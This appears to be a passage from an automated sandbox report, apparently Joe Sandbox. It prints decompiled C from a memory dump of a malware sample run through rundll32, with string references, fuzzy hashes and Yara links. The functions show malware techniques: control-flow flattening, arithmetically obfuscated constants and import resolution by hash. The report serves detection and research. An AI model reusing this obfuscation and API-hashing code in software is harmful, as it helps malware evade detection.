Function 002A76D5, Relevance: 3.9, Strings: 3, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E002A76D5(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				void* _t113;
				signed int _t122;
				signed int _t124;
				void* _t131;
				signed int _t137;
				intOrPtr* _t152;
				signed int _t153;
				signed int _t154;
				signed int* _t158;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t113);
				_v564 = 0x2e1d;
				_t158 =  &(( &_v604)[6]);
				_v564 = _v564 + 0xffff2df8;
				_v564 = _v564 ^ 0xffff756e;
				_t131 = 0x16b99a34;
				_v604 = 0x22f3;
				_v604 = _v604 + 0xc117;
				_v604 = _v604 ^ 0xd59440b8;
				_v604 = _v604 | 0xbe9b7d7a;
				_v604 = _v604 ^ 0xff9fffe8;
				_v572 = 0x42a;
				_v572 = _v572 ^ 0x91478bff;
				_v572 = _v572 + 0xffffcdcf;
				_v572 = _v572 ^ 0x91473180;
				_v576 = 0x3632;
				_v576 = _v576 ^ 0x3125205f;
				_t29 =  &_v576; // 0x3125205f
				_t153 = 0x41;
				_v576 =  *_t29 * 0x3e;
				_v576 = _v576 ^ 0xe6fb13e4;
				_v584 = 0x2c1e;
				_v584 = _v584 + 0x8805;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x02d0ecc1;
				_v580 = 0x1d8f;
				_v580 = _v580 / _t153;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x001d5df6;
				_v568 = 0xfcf4;
				_v568 = _v568 | 0x643978fc;
				_v568 = _v568 ^ 0x6439d8b9;
				_v588 = 0x76ff;
				_v588 = _v588 + 0x349d;
				_v588 = _v588 >> 2;
				_v588 = _v588 ^ 0x000000d3;
				_v600 = 0xafc6;
				_v600 = _v600 ^ 0x7a414f6e;
				_v600 = _v600 << 0xb;
				_t154 = 0x3e;
				_t155 = _v568;
				_v600 = _v600 / _t154;
				_v600 = _v600 ^ 0x003e7414;
				_v592 = 0xf6e8;
				_v592 = _v592 | 0x0194443a;
				_v592 = _v592 + 0x30;
				_v592 = _v592 ^ 0x0194fdd0;
				_v596 = 0x7b4;
				_v596 = _v596 + 0xffff6047;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0xff67df58;
				_v560 = 0x1e52;
				_v560 = _v560 + 0xdf63;
				_v560 = _v560 ^ 0x0000fdb7;
				do {
					while(_t131 != 0x1c5d7db) {
						if(_t131 == 0x699d9d9) {
							_t122 =  *_t152( &_v556, _a12);
							asm("sbb ecx, ecx");
							_t137 =  ~_t122 & 0xdab6f1fd;
							L13:
							_t131 = _t137 + 0x2ed6f5d7;
							continue;
						}
						if(_t131 == 0x98de7d4) {
							_t124 = E0029E233(_t155, _v580,  &_v556, _v568);
							asm("sbb ecx, ecx");
							_t137 =  ~_t124 & 0xd7c2e402;
							goto L13;
						}
						if(_t131 != 0x1007a90d) {
							if(_t131 == 0x16b99a34) {
								_t131 = 0x1007a90d;
								continue;
							} else {
								if(_t131 == 0x2ed6f5d7) {
									return E002A0DE5(_v588, _v592, _t155, _v596);
								}
								goto L18;
							}
						}
						L10:
						_t124 = E002A6686(_t131, _t131, _v560);
						_t155 = _t124;
						_t158 =  &(_t158[3]);
						if(_t124 != 0xffffffff) {
							_t131 = 0x1c5d7db;
							continue;
						}
						return _t124;
					}
					_v556 = 0x22c;
					if(E002A349F( &_v556, _v576, _v584, _t155) == 0) {
						_t131 = 0x2ed6f5d7;
						goto L18;
					} else {
						_t131 = 0x699d9d9;
						continue;
					}
					goto L10;
					L18:
				} while (_t131 != 0xe318343);
				return _t124;
			}

0x002a76df
0x002a76e6
0x002a76e8
0x002a76ef
0x002a76f6
0x002a76fd
0x002a76fe
0x002a76ff
0x002a7704
0x002a770c
0x002a770f
0x002a7719
0x002a7721
0x002a7726
0x002a7733
0x002a7740
0x002a7748
0x002a7750
0x002a7758
0x002a7760
0x002a7768
0x002a7770
0x002a7778
0x002a7780
0x002a7788
0x002a778f
0x002a7792
0x002a7796
0x002a779e
0x002a77a6
0x002a77ae
0x002a77b3
0x002a77bb
0x002a77cb
0x002a77cf
0x002a77d4
0x002a77dc
0x002a77e4
0x002a77ec
0x002a77f4
0x002a77fc
0x002a7804
0x002a7809
0x002a7811
0x002a7819
0x002a7821
0x002a782a
0x002a782d
0x002a7831
0x002a7835
0x002a783d
0x002a7845
0x002a784d
0x002a7852
0x002a785a
0x002a7862
0x002a786a
0x002a786f
0x002a7877
0x002a787f
0x002a7887
0x002a788f
0x002a788f
0x002a789d
0x002a794b
0x002a7951
0x002a7953
0x002a7938
0x002a7938
0x00000000
0x002a7938
0x002a78a9
0x002a7925
0x002a7930
0x002a7932
0x00000000
0x002a7932
0x002a78b1
0x002a78b9
0x002a78e7
0x00000000
0x002a78bb
0x002a78bd
0x00000000
0x002a78d9
0x00000000
0x002a78bd
0x002a78b9
0x002a78ee
0x002a7900
0x002a7905
0x002a7907
0x002a790d
0x002a790f
0x00000000
0x002a790f
0x002a78e6
0x002a78e6
0x002a7968
0x002a7979
0x002a7985
0x00000000
0x002a797b
0x002a797b
0x00000000
0x002a797b
0x00000000
0x002a7987
0x002a7987
0x00000000

Strings

nOAz, xrefs: 002A7819
0, xrefs: 002A784D
_ %1, xrefs: 002A7788

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0$_ %1$nOAz
API String ID: 0-3467203319
Opcode ID: dd5fd6802971e47e195d88eaaba00c39b4aac39a90898c87524bdca614574710
Instruction ID: 79dd710c40f8bedb495833934538f400a46cb86054db3db1a78429933d821e68
Opcode Fuzzy Hash: dd5fd6802971e47e195d88eaaba00c39b4aac39a90898c87524bdca614574710
Instruction Fuzzy Hash: AC61AD7151C3429FD758DE25C88942FBBE1EBC5358F100A1DF496822A0DB78CA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0029D04B, Relevance: 3.9, Strings: 3, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E0029D04B(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				intOrPtr _t128;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t146;
				void* _t147;
				signed int _t150;
				intOrPtr* _t153;
				signed int* _t154;

				_t154 =  &_v564;
				_v536 = 0x5a08;
				_v536 = _v536 | 0xb841b3d1;
				_v536 = _v536 << 8;
				_v536 = _v536 ^ 0x41fbf5e5;
				_v524 = 0x1bb5;
				_v524 = _v524 | 0x1fc37f08;
				_v524 = _v524 ^ 0x1fc367a6;
				_v528 = 0x1421;
				_t153 = __edx;
				_t128 = __ecx;
				_t147 = 0x1ed04b15;
				_t130 = 0x6f;
				_v528 = _v528 / _t130;
				_v528 = _v528 ^ 0x00007e1e;
				_v544 = 0xd073;
				_v544 = _v544 << 5;
				_v544 = _v544 << 2;
				_v544 = _v544 ^ 0x00685a54;
				_v556 = 0x91e6;
				_v556 = _v556 + 0xffff91b4;
				_v556 = _v556 >> 8;
				_v556 = _v556 << 9;
				_v556 = _v556 ^ 0x00003d2d;
				_v564 = 0x9352;
				_v564 = _v564 << 0xe;
				_v564 = _v564 + 0xffff4f54;
				_t131 = 0x74;
				_v564 = _v564 * 0x26;
				_v564 = _v564 ^ 0x7770de4f;
				_v532 = 0x91f1;
				_v532 = _v532 + 0xffffadbd;
				_v532 = _v532 ^ 0x00001bea;
				_v552 = 0xd3ea;
				_v552 = _v552 + 0x7337;
				_v552 = _v552 >> 0xd;
				_v552 = _v552 | 0x8386dcfa;
				_v552 = _v552 ^ 0x8386e5f5;
				_v560 = 0x60cf;
				_v560 = _v560 + 0xffff84a3;
				_v560 = _v560 >> 9;
				_t146 = _v532;
				_v560 = _v560 / _t131;
				_v560 = _v560 ^ 0x00013446;
				_v540 = 0xb068;
				_t132 = 0x2b;
				_v540 = _v540 / _t132;
				_v540 = _v540 << 2;
				_v540 = _v540 ^ 0x00004da8;
				_v548 = 0xbeec;
				_v548 = _v548 ^ 0xb2af735b;
				_v548 = _v548 * 0x7d;
				_v548 = _v548 + 0x1fa5;
				_v548 = _v548 ^ 0x3fd7d166;
				while(_t147 != 0xa2eaa3) {
					if(_t147 == 0x1d9f6e57) {
						_push(_v560);
						_push(_v552);
						_push(0);
						_push(_v532);
						_push(0);
						_push(_v564);
						_push( &_v520);
						_push(0);
						_t120 = E002A4DAD(_v556, __eflags);
						_t154 =  &(_t154[8]);
						asm("sbb esi, esi");
						_t150 =  ~_t120 & 0x352323de;
						L9:
						_t147 = _t150 + 0xa2eaa3;
						continue;
					}
					if(_t147 != 0x1ed04b15) {
						if(_t147 == 0x20b7e9af) {
							_t125 = E00292746(_t128, _t153, 0x2af1d0,  &_v520);
							asm("sbb esi, esi");
							_pop(_t132);
							_t150 =  ~_t125 & 0x1cfc83b4;
							__eflags = _t150;
							goto L9;
						} else {
							if(_t147 == 0x35c60e81) {
								 *((intOrPtr*)(_t146 + 0x1c)) = _t128;
								_t127 =  *0x2b0718; // 0x0
								 *(_t146 + 8) = _t127;
								 *0x2b0718 = _t146;
								return _t127;
							}
							L14:
							__eflags = _t147 - 0xc0fab83;
							if(__eflags != 0) {
								continue;
							} else {
								return _t125;
							}
						}
						L7:
						return _t125;
					}
					_push(_t132);
					_push(_t132);
					_t125 = E002A9E2B(0x38);
					_t146 = _t125;
					_t154 =  &(_t154[3]);
					__eflags = _t146;
					if(__eflags != 0) {
						_t147 = 0x20b7e9af;
						continue;
					}
					goto L7;
				}
				E0029EF80(_v540, _t146, _v548);
				_pop(_t132);
				_t147 = 0xc0fab83;
				goto L14;
			}

0x0029d04b
0x0029d051
0x0029d059
0x0029d061
0x0029d066
0x0029d06e
0x0029d076
0x0029d07e
0x0029d086
0x0029d096
0x0029d098
0x0029d09e
0x0029d0a3
0x0029d0a8
0x0029d0ae
0x0029d0b6
0x0029d0be
0x0029d0c3
0x0029d0c8
0x0029d0d0
0x0029d0d8
0x0029d0e0
0x0029d0e5
0x0029d0ea
0x0029d0f2
0x0029d0fa
0x0029d0ff
0x0029d10c
0x0029d10f
0x0029d113
0x0029d11b
0x0029d123
0x0029d12b
0x0029d133
0x0029d13b
0x0029d143
0x0029d148
0x0029d150
0x0029d158
0x0029d160
0x0029d168
0x0029d175
0x0029d179
0x0029d17d
0x0029d185
0x0029d191
0x0029d194
0x0029d198
0x0029d19d
0x0029d1a5
0x0029d1ad
0x0029d1ba
0x0029d1be
0x0029d1c6
0x0029d1ce
0x0029d1e0
0x0029d273
0x0029d27b
0x0029d27f
0x0029d281
0x0029d285
0x0029d287
0x0029d28f
0x0029d290
0x0029d292
0x0029d297
0x0029d29e
0x0029d2a0
0x0029d23f
0x0029d23f
0x00000000
0x0029d23f
0x0029d1ec
0x0029d1f4
0x0029d22c
0x0029d236
0x0029d238
0x0029d239
0x0029d239
0x00000000
0x0029d1f6
0x0029d1fc
0x0029d202
0x0029d205
0x0029d20a
0x0029d20d
0x00000000
0x0029d20d
0x0029d2bd
0x0029d2bd
0x0029d2c3
0x00000000
0x00000000
0x00000000
0x00000000
0x0029d2c3
0x0029d21d
0x0029d21d
0x0029d21d
0x0029d257
0x0029d258
0x0029d25b
0x0029d260
0x0029d262
0x0029d265
0x0029d267
0x0029d269
0x00000000
0x0029d269
0x00000000
0x0029d267
0x0029d2b2
0x0029d2b7
0x0029d2b8
0x00000000

Strings

7s, xrefs: 0029D13B
TZh, xrefs: 0029D0C8
-=, xrefs: 0029D0EA

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -=$7s$TZh
API String ID: 0-1347970498
Opcode ID: 27c9fcfec58ab292ba4c71a4b1caddb60ce229db117ac81f60356c2e986396a1
Instruction ID: c747c3227ca82e2b34dec7b8989ac959e54f41d222c5fbbcb55c16089e8ccb16
Opcode Fuzzy Hash: 27c9fcfec58ab292ba4c71a4b1caddb60ce229db117ac81f60356c2e986396a1
Instruction Fuzzy Hash: 47518A729083018BD754CF25C88940BBBE1FBC8758F144A1DF899A72A0D3B8DA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00298994, Relevance: 3.9, Strings: 3, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00298994(void* __ecx, void* __edx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t76;
				signed short _t82;
				signed short _t85;
				signed short _t87;
				signed int _t89;
				intOrPtr _t90;
				signed short _t94;
				signed short* _t102;
				signed short _t104;
				void* _t105;
				signed int* _t106;

				_t106 =  &_v44;
				_v16 = 0x77e01;
				asm("stosd");
				_t105 = __ecx;
				_t89 = 0x45;
				asm("stosd");
				asm("stosd");
				_v32 = 0x737d;
				_v32 = _v32 + 0xe341;
				_v32 = _v32 ^ 0x000156bf;
				_v44 = 0x4d00;
				_v44 = _v44 << 5;
				_v44 = _v44 + 0xffffa257;
				_v44 = _v44 ^ 0xa2d66e40;
				_v44 = _v44 ^ 0xa2df3531;
				_v24 = 0xaca1;
				_v24 = _v24 | 0x541d16d2;
				_v24 = _v24 ^ 0x541dd906;
				_v28 = 0xdc4b;
				_v28 = _v28 + 0x3e43;
				_v28 = _v28 ^ 0x00016561;
				_v36 = 0x52d2;
				_v36 = _v36 | 0xacca9eaf;
				_v36 = _v36 >> 9;
				_v36 = _v36 / _t89;
				_v36 = _v36 ^ 0x00017c78;
				_v20 = 0x7ed4;
				_v20 = _v20 + 0xffff7f18;
				_v20 = _v20 ^ 0xffffb8e1;
				_v40 = 0x21ee;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe6635ee3;
				_v40 = _v40 + 0xffff583b;
				_v40 = _v40 ^ 0xe76b8038;
				_t76 = _v32;
				_t90 =  *((intOrPtr*)(__edx + 0x78 + _t76 * 8));
				if(_t90 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t76 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t104 = _t90 + __ecx;
					while(1) {
						_t79 =  *((intOrPtr*)(_t104 + 0xc));
						if( *((intOrPtr*)(_t104 + 0xc)) == 0) {
							goto L13;
						}
						_t94 = E0029E859(_t79 + _t105, _v44, _v24, _v28);
						_v32 = _t94;
						__eflags = _t94;
						if(_t94 == 0) {
							L15:
							return 0;
						}
						_t102 =  *_t104 + _t105;
						_t87 =  *((intOrPtr*)(_t104 + 0x10)) + _t105;
						while(1) {
							_t82 =  *_t102;
							__eflags = _t82;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t84 = _t82 + 2 + _t105;
								__eflags = _t82 + 2 + _t105;
							} else {
								_t84 = _t82 & 0x0000ffff;
							}
							_t85 = E002A28D1(_t94, _v36, _v20, _v40, _t84);
							_t106 =  &(_t106[3]);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							} else {
								_t94 = _v32;
								_t102 =  &(_t102[2]);
								 *_t87 = _t85;
								_t87 = _t87 + 4;
								__eflags = _t87;
								continue;
							}
						}
						_t104 = _t104 + 0x14;
						__eflags = _t104;
					}
					goto L13;
				}
			}

0x00298994
0x00298997
0x002989ab
0x002989ac
0x002989b2
0x002989b3
0x002989b4
0x002989b5
0x002989bd
0x002989c5
0x002989cd
0x002989d5
0x002989da
0x002989e2
0x002989ea
0x002989f2
0x002989fa
0x00298a02
0x00298a0a
0x00298a12
0x00298a1a
0x00298a22
0x00298a2a
0x00298a32
0x00298a3d
0x00298a41
0x00298a49
0x00298a51
0x00298a59
0x00298a61
0x00298a69
0x00298a6e
0x00298a76
0x00298a7e
0x00298a86
0x00298a8a
0x00298a90
0x00298b0a
0x00000000
0x00298a99
0x00298a99
0x00298b03
0x00298b03
0x00298b08
0x00000000
0x00000000
0x00298ab4
0x00298ab6
0x00298aba
0x00298abc
0x00298b15
0x00000000
0x00298b15
0x00298ac3
0x00298ac5
0x00298afa
0x00298afa
0x00298afc
0x00298afe
0x00000000
0x00000000
0x00298ac9
0x00298ad3
0x00298ad3
0x00298acb
0x00298acb
0x00298acb
0x00298ae2
0x00298ae7
0x00298aea
0x00298aec
0x00000000
0x00298aee
0x00298aee
0x00298af2
0x00298af5
0x00298af7
0x00298af7
0x00000000
0x00298af7
0x00298aec
0x00298b00
0x00298b00
0x00298b00
0x00000000
0x00298b03

Strings

C>, xrefs: 00298A12
^c, xrefs: 00298A6E
A, xrefs: 002989BD

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A$C>$^c
API String ID: 0-2805127395
Opcode ID: ec5b13b9b7a671a2e1ab6923ca7c0661cdd71d90ba0d41f145633eea2a1d1d66
Instruction ID: 0d7ca52003c7f5effad3585357bf638edb8ec4c48f2ce432e5f0c16f5134cdf9
Opcode Fuzzy Hash: ec5b13b9b7a671a2e1ab6923ca7c0661cdd71d90ba0d41f145633eea2a1d1d66
Instruction Fuzzy Hash: F341CDB16283028FE754CF25C84552BBBE0FF95398F180D1CE88692260D7B8DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00293618, Relevance: 3.8, Strings: 3, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00293618(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				void* _t110;
				void* _t122;

				_push(_a20);
				_push(0x104);
				_push(_a12);
				_v56 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(0x104);
				_v16 = 0x7ceb;
				_v16 = _v16 ^ 0x49d7f74a;
				_t122 = 0;
				_v16 = _v16 >> 5;
				_v16 = _v16 * 0x27;
				_v16 = _v16 ^ 0x59fe9250;
				_v12 = 0xb3c1;
				_v12 = _v12 + 0xffffb44d;
				_v12 = _v12 ^ 0xf3173633;
				_v12 = _v12 | 0xa0360c36;
				_v12 = _v12 ^ 0xf33726b3;
				_v8 = 0xcd86;
				_v8 = _v8 * 0x58;
				_v8 = _v8 << 1;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00002a19;
				_v32 = 0x91a;
				_v32 = _v32 | 0x3e099dbe;
				_v32 = _v32 ^ 0x3e09a592;
				_v40 = 0x763a;
				_v40 = _v40 | 0xee9404cc;
				_v40 = _v40 ^ 0xee941bd0;
				_v20 = 0xd020;
				_v20 = _v20 | 0xa6e548c3;
				_v20 = _v20 * 0xc;
				_v20 = _v20 + 0x9008;
				_v20 = _v20 ^ 0xd2c6c61f;
				_v36 = 0x82d2;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x00415dbf;
				_v52 = 0x37c;
				_v52 = _v52 + 0xd80c;
				_v52 = _v52 ^ 0x00008ee7;
				_v28 = 0xfa6a;
				_v28 = _v28 >> 9;
				_v28 = _v28 | 0xa6d36daa;
				_v28 = _v28 ^ 0xa6d32cf7;
				_v48 = 0x83ac;
				_v48 = _v48 + 0x5d4d;
				_v48 = _v48 ^ 0x00009b2d;
				_v44 = 0xc22;
				_v44 = _v44 + 0xe4dd;
				_v44 = _v44 ^ 0x0000f4cf;
				_v24 = 0xb3a6;
				_v24 = _v24 ^ 0xe8679b38;
				_v24 = _v24 | 0x9e5185d0;
				_v24 = _v24 ^ 0xfe77bdde;
				_t110 = E002A9D7E(__ecx, _a4, __ecx, _v24);
				_t121 = _t110;
				if(_t110 != 0) {
					_t122 = E002A353E(_a20, _v40, _t121, _v20,  &_v56, _v36);
					E002A0DE5(_v52, _v48, _t121, _v44);
				}
				return _t122;
			}

0x00293620
0x00293628
0x00293629
0x0029362c
0x0029362f
0x00293632
0x00293635
0x00293636
0x00293637
0x0029363c
0x00293646
0x0029364d
0x0029364f
0x0029365a
0x0029365d
0x00293664
0x0029366b
0x00293672
0x00293679
0x00293680
0x00293687
0x00293692
0x00293695
0x00293698
0x0029369c
0x002936a3
0x002936aa
0x002936b1
0x002936b8
0x002936bf
0x002936c6
0x002936cd
0x002936d4
0x002936df
0x002936e2
0x002936e9
0x002936f0
0x002936f7
0x002936fb
0x00293702
0x00293709
0x00293710
0x00293717
0x0029371e
0x00293722
0x00293729
0x00293730
0x00293737
0x0029373e
0x00293745
0x0029374c
0x00293753
0x0029375a
0x00293761
0x00293768
0x0029376f
0x00293786
0x0029378b
0x00293792
0x002937ad
0x002937b9
0x002937be
0x002937c8

Strings

|, xrefs: 0029363C
M], xrefs: 00293737
:v, xrefs: 002936B8

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: :v$M]$|
API String ID: 2962429428-2341810049
Opcode ID: 09590b60ec02a54a58058a1daf18f7eb9f81633290d7e571df980ea3fb6bc415
Instruction ID: b20bac58a47b781fc95e9f4aef03d4007bae7e4d86c89ae6112dc4f79f411188
Opcode Fuzzy Hash: 09590b60ec02a54a58058a1daf18f7eb9f81633290d7e571df980ea3fb6bc415
Instruction Fuzzy Hash: 9251E3B1C0020EABEF54CFE5C98A8EEBBB1FB44314F208149E911B6260D3794B54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002A0C65, Relevance: 3.8, Strings: 3, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E002A0C65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t98;
				signed int _t111;
				signed int _t112;
				signed int _t113;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t98);
				_v32 = 0x755b;
				_v32 = _v32 ^ 0x7dbdfe60;
				_v32 = _v32 ^ 0x7dbdbb09;
				_v8 = 0xc028;
				_v8 = _v8 ^ 0xc114373d;
				_v8 = _v8 ^ 0x97b3d78c;
				_v8 = _v8 ^ 0xf8767868;
				_v8 = _v8 ^ 0xaed17c52;
				_v28 = 0x6b33;
				_v28 = _v28 ^ 0xc5c1c0a7;
				_v28 = _v28 ^ 0xc5c1a983;
				_v16 = 0xf7dc;
				_t111 = 0x35;
				_v16 = _v16 / _t111;
				_v16 = _v16 << 0xb;
				_v16 = _v16 + 0x3d0c;
				_v16 = _v16 ^ 0x0025bfca;
				_v36 = 0x9b2c;
				_v36 = _v36 + 0xfffffecb;
				_v36 = _v36 ^ 0x0000d99c;
				_v24 = 0xb8e;
				_v24 = _v24 + 0xffff9c64;
				_v24 = _v24 + 0xffff30f8;
				_v24 = _v24 ^ 0xfffe9b12;
				_v12 = 0x6ba4;
				_v12 = _v12 | 0xbe6690b5;
				_v12 = _v12 >> 9;
				_t112 = 9;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x1c434bfa;
				_v20 = 0x334e;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 | 0xdbae22e0;
				_v20 = _v20 ^ 0xdbae13b7;
				_v44 = 0x60c0;
				_t113 = 0x64;
				_v44 = _v44 / _t112;
				_v44 = _v44 ^ 0x00007d99;
				_v40 = 0x3ffc;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x000050b9;
				_push(_v28);
				_push(_v8);
				E0029F882(_v40, E00296ABA(_v32, 0x2af9b0, _v40), _v16, _v36, _v24, _v12, __ecx, _a8);
				return E0029F935(_v20, _t107, _v44, _v40);
			}

0x002a0c6d
0x002a0c72
0x002a0c75
0x002a0c78
0x002a0c7b
0x002a0c7e
0x002a0c7f
0x002a0c80
0x002a0c85
0x002a0c8e
0x002a0c95
0x002a0c9c
0x002a0ca3
0x002a0caa
0x002a0cb1
0x002a0cb8
0x002a0cbf
0x002a0cc6
0x002a0ccd
0x002a0cd4
0x002a0ce0
0x002a0ce5
0x002a0cea
0x002a0cee
0x002a0cf5
0x002a0cfc
0x002a0d03
0x002a0d0a
0x002a0d11
0x002a0d18
0x002a0d1f
0x002a0d26
0x002a0d2d
0x002a0d34
0x002a0d3b
0x002a0d43
0x002a0d46
0x002a0d49
0x002a0d50
0x002a0d57
0x002a0d5b
0x002a0d5f
0x002a0d66
0x002a0d6d
0x002a0d79
0x002a0d7a
0x002a0d7f
0x002a0d86
0x002a0d97
0x002a0d9a
0x002a0da1
0x002a0da4
0x002a0dc5
0x002a0de4

Strings

3k, xrefs: 002A0CBF
N3, xrefs: 002A0D50
[u, xrefs: 002A0C85

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3k$N3$[u
API String ID: 0-953518783
Opcode ID: 2a2222f589a42e0237bea138b332164fc4cedb4025c8f5113766aa7b091943c8
Instruction ID: 95ddddb3fa56e279152c021f92927b6800bd66bdad0be15ee51ec32af4ddd66c
Opcode Fuzzy Hash: 2a2222f589a42e0237bea138b332164fc4cedb4025c8f5113766aa7b091943c8
Instruction Fuzzy Hash: B7410371D0021AEFDF49CFA1C94A8EEBFB2FB48314F208159E511762A0D7B61A55DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0029C3C2, Relevance: 2.8, Strings: 2, Instructions: 254
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E0029C3C2() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				signed int _t261;
				short _t272;
				void* _t280;
				signed int _t286;
				void* _t289;
				void* _t290;
				void* _t293;
				void* _t311;
				short _t312;
				void* _t313;
				short* _t314;
				short* _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t323;

				_v120 = _v120 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_t289 = 0x23d7c174;
				_v128 = 0x3824f4;
				_v124 = 0x5a911d;
				_t312 =  *0x2b0724; // 0x340cf0
				_v8 = 0x7a2e;
				_v8 = _v8 + 0x3a9;
				_v8 = _v8 | 0xb561881f;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x87f74adc;
				_v72 = 0x7cc0;
				_v72 = _v72 + 0x9bff;
				_v72 = _v72 ^ 0x00010968;
				_v96 = 0xf1f4;
				_v96 = _v96 + 0xffff5e1e;
				_v96 = _v96 ^ 0x00001e10;
				_v16 = 0x14bd;
				_v16 = _v16 + 0x8b34;
				_v16 = _v16 + 0xffff29ac;
				_t316 = 0x1a;
				_v16 = _v16 / _t316;
				_v16 = _v16 ^ 0x09d8d05e;
				_v48 = 0x830c;
				_v48 = _v48 >> 5;
				_v48 = _v48 ^ 0x2c4d9176;
				_v48 = _v48 ^ 0x2c4daafb;
				_v92 = 0xd604;
